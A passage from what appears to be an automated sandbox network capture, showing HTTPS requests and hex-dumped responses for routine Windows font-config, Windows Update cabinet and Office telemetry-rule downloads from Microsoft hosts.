                User-Agent: Microsoft BITS/7.8
                Host: fs.microsoft.com
                2024-10-07 01:25:54 UTC467INHTTP/1.1 200 OK
                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                Content-Type: application/octet-stream
                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                Server: ECAcc (lpl/EF45)
                X-CID: 11
                X-Ms-ApiVersion: Distribute 1.2
                X-Ms-Region: prod-weu-z1
                Cache-Control: public, max-age=227988
                Date: Mon, 07 Oct 2024 01:25:54 GMT
                Connection: close
                X-CID: 2


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.449742184.28.90.27443
                TimestampBytes transferredDirectionData
                2024-10-07 01:25:54 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                Range: bytes=0-2147483646
                User-Agent: Microsoft BITS/7.8
                Host: fs.microsoft.com
                2024-10-07 01:25:55 UTC515INHTTP/1.1 200 OK
                ApiVersion: Distribute 1.1
                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                Content-Type: application/octet-stream
                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                Server: ECAcc (lpl/EF06)
                X-CID: 11
                X-Ms-ApiVersion: Distribute 1.2
                X-Ms-Region: prod-weu-z1
                Cache-Control: public, max-age=227923
                Date: Mon, 07 Oct 2024 01:25:55 GMT
                Content-Length: 55
                Connection: close
                X-CID: 2
                2024-10-07 01:25:55 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.4497434.245.163.56443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:04 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CYlyNmHefF3vTN3&MD=tUybo+Oc HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                Host: slscr.update.microsoft.com
                2024-10-07 01:26:04 UTC560INHTTP/1.1 200 OK
                Cache-Control: no-cache
                Pragma: no-cache
                Content-Type: application/octet-stream
                Expires: -1
                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                MS-CorrelationId: b05a36f0-6f54-4c67-bd7e-7f1d7d6cc2e4
                MS-RequestId: f7e4d0d1-e9e4-4c47-bb0c-779f33dc26f3
                MS-CV: 32FOnau2Q02u8tEr.0
                X-Microsoft-SLSClientCache: 2880
                Content-Disposition: attachment; filename=environment.cab
                X-Content-Type-Options: nosniff
                Date: Mon, 07 Oct 2024 01:26:04 GMT
                Connection: close
                Content-Length: 24490
                2024-10-07 01:26:04 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                2024-10-07 01:26:04 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.4497494.245.163.56443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:42 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CYlyNmHefF3vTN3&MD=tUybo+Oc HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                Host: slscr.update.microsoft.com
                2024-10-07 01:26:42 UTC560INHTTP/1.1 200 OK
                Cache-Control: no-cache
                Pragma: no-cache
                Content-Type: application/octet-stream
                Expires: -1
                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                MS-CorrelationId: dbd114a1-ec38-4729-b24c-1bff19bed4cd
                MS-RequestId: 7172746f-7851-452c-9431-5e0798016ba1
                MS-CV: AXw1UcY/oUGirOsG.0
                X-Microsoft-SLSClientCache: 1440
                Content-Disposition: attachment; filename=environment.cab
                X-Content-Type-Options: nosniff
                Date: Mon, 07 Oct 2024 01:26:42 GMT
                Connection: close
                Content-Length: 30005
                2024-10-07 01:26:42 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                2024-10-07 01:26:42 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                Session IDSource IPSource PortDestination IPDestination Port
                5192.168.2.44975013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:44 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:44 UTC540INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:44 GMT
                Content-Type: text/plain
                Content-Length: 218853
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public
                Last-Modified: Fri, 04 Oct 2024 23:21:50 GMT
                ETag: "0x8DCE4CB535A72FA"
                x-ms-request-id: 4dad204e-401e-005b-4bf5-169c0c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012644Z-1657d5bbd482lxwq1dp2t1zwkc00000002kg000000008v7p
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:44 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                2024-10-07 01:26:44 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                2024-10-07 01:26:44 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                2024-10-07 01:26:44 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                2024-10-07 01:26:44 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                2024-10-07 01:26:44 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                2024-10-07 01:26:44 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                2024-10-07 01:26:44 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                2024-10-07 01:26:44 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                2024-10-07 01:26:44 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                Session IDSource IPSource PortDestination IPDestination Port
                6192.168.2.44975113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:45 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:45 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:45 GMT
                Content-Type: text/xml
                Content-Length: 2980
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                ETag: "0x8DC582BA80D96A1"
                x-ms-request-id: 8aaf7b13-d01e-0028-46fd-167896000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012645Z-1657d5bbd48f7nlxc7n5fnfzh000000002bg00000000neq5
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:45 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                Session IDSource IPSource PortDestination IPDestination Port
                7192.168.2.44975413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:45 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:45 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:45 GMT
                Content-Type: text/xml
                Content-Length: 2160
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                ETag: "0x8DC582BA3B95D81"
                x-ms-request-id: c59bb0f9-701e-0097-2d01-17b8c1000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012645Z-1657d5bbd48wd55zet5pcra0cg00000002rg00000000f66x
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
